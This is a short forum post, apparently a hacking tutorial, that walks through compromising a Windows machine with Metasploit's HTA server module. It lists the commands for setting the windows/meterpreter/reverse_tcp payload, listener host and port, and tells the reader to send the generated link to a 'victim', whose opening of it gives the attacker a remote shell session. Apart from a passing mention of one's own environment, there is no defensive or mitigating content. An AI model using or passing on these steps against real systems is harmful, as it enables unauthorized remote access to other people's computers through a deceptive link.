Hacking Windows With HTML Application

Greetings everyone, hope you all are fine and shine. Today I have a different topic than others, we’ve seen different ways of exploiting windows operating system with payloads. We also have different delivery mechanism of the payload, In this case the idea is the same, we will use a payload also but this is going to be a little different.
Purpose of making this post is that most of the people are not aware of this method of hacking into windows.
For this purpose we will use an exploit which I believe is not present in older versions of Linux.
So now let’s see how to do it.

(1) As always run Metasploit-Framework
(2) use exploit → use exploit/windows/misc/hta_server
(3) Set lhost, srvhost
(4) Then set the payload for windows (set payload windows/meterpreter/reverse_tcp)
(5) Set lport (anything you like i.e 5555)
(6) After this is done, hit exploit

You will get a link in your terminal, all you have to do is to just copy and send to your victim (as in our case we will target our own environment)

After you open the link it will download a payload, once it is installed you will get the session.
Thank YOU

Still need help? = - YouTube

2 Likes